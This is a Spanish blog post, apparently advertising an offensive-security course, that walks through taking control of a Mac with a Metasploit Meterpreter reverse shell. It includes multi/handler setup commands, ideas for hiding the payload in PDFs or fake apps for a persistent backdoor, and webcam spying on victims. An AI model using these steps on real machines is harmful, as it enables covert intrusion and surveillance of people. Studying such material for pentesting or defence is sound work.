Hackeando Mac OSX con Mach-0

Por desgracia para los usuarios de Apple, las amenazas para las computadoras que poseen el sistema operativo macOSX sigue siendo una realidad desde hace ya varios años aunque no se quedan atrás los ataques hacia los equipos Windows. Estas amenazas poseen el mismo poder para robar información. Aunque existen algunas herramientas que nos pueden ayudar a prevenir o detectar este tipo de intrusiones pero hoy nos enfocaremos al tema de intrusión.

En esta ocasión veremos el uso de metasploit y sus diferentes payloads, durante el curso veremos diferentes distribuciones de linux precargadas con herramientas de pentesting que nos ayudaran durante este proceso, también otros pre configurados para pruebas de seguridad en la red y otros para técnicas de informática forense. Estas distribuciones son parte del material durante el curso de hacking ofensivo nivel 1 o puedes descargarlas desde las paginas oficiales.

La intrusión obtenida por algún malware o lanzada desde un payload para conexión inversa puede resultar algo sencillo si consideramos que tenemos equipos OSX sin usar protecciones desde una simple contraseña para el acceso o soluciones que detecten estas conexiones o modificaciones, aunque esto no impediría que alguien obtuviera acceso a tu computadora pues existen diferentes herramientas libres y herramientas comerciales que nos facilitan realizar un bypass a las protecciones por contraseña que se implementan tanto en equipos Microsoft Windows como en equipos Mac OSX, algo que veremos durante el curso y que seguramente ya han leído desde nuestro blog.

La técnica que usaremos sera el lanzamiento de una conexión meterpreter para lo que podemos usar un simple binario .macho que mande una conexión inversa hacia nuestro dispositivo o el equipo donde vamos a controlar a nuestras victimas/zombies.  También existen técnicas para esconder este tipo de payloads por ejemplo en documentos .PDF, dentro de alguna aplicación legitima o usando un launcher desde el navegador.

Podemos hacer de distintas maneras. Aquí usaremos la consola de metasploit para crear una shell .macho así que ejecutamos metasploit escribiendo:

msfconsole

.Macho = MACH-O, abreviatura del formato de archivo de objeto que es un formato de archivos ejecutables, código de objeto, bibliotecas compartidas y código cargado dinamicamente para el kernel de OS X. En otras palabras es un binario ejecutable que puede ser lanzado desde el terminal. Este se introduce por default desde OS X 10.6 en adelante

Esto nos creara un payload en el escritorio listo para ser enviado o ejecutado en el equipo victima

Antes de lanzar el payload nos pondremos en escucha desde nuestra consola en metasploit usando el multi handler:

use exploit/multi/handler

set PAYLOAD osx/x64/meterpreter_reverse_tcp

set LHOST (aqui tu IP )

run

Para infectar o ejecutar nuestro payload dentro del equipo victima se podría lanzar o bien ejecutarlo de forma física en el equipo pero también se podria ocultar simulando ser alguna aplicación legitima para instalar un backdoor con persistencia, una vez que el equipo ha sido vulnerado desde la red lo cual puede ser mucho mas complejo o como mencione anteriormente escondido dentro de algun .PDF. Durante el curso haremos estas pruebas desde una iMac:

Una vez que el payload ha sido lanzado desde los equipos victima, de forma remota podemos ver la sesión meterpreter que nos acaba de mostrar en consola:

Como ya todos saben desde meterpreter podemos hacer uso de una serie de funciones que nos permitirían crear persistencia, dejar alguna otra puerta trasera, navegar entre carpetas, subir y descargar archivos o activar micrófono y cámara en tiempo real:

usando: webcam_stream para activar la webcam en tiempo real

Aqui tambien

Durante el curso trabajaremos con diferentes sistemas operativos desde Micrososft windows en diferentes versiones hasta equipos OSX, aquí vemos el ejemplo lanzando el payload en una Macbook Pro retina donde resolverán retos y ejercicios:

Las fotografías una vez activadas la cámara o micrófono se almacenaran en tu maquina:

Este tipo de conexiones salientes en tus equipos podemos detectarlas fácilmente interceptando las conexiones desde un Proxy. Existen una variedad de herramientas libres y herramientas comerciales aunque también lo aprenderemos durante el curso de hacking nivel 1, pero si solo quieres estar alerta de tu mackbook ante los ojos curiosos de tu Mamá, novia o tus amigos de la escuela te recomiendo la siguiente aplicación que te alerta sobre cualquier movimiento en tu equipo e incluso te permite activar un cifrado del disco duro o tomar les una fotografía usando la webcam para verla desde tu celular en el que te llegaran las alertas.

Alejandro Torres a.k.a Torrescrack

Saludos!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *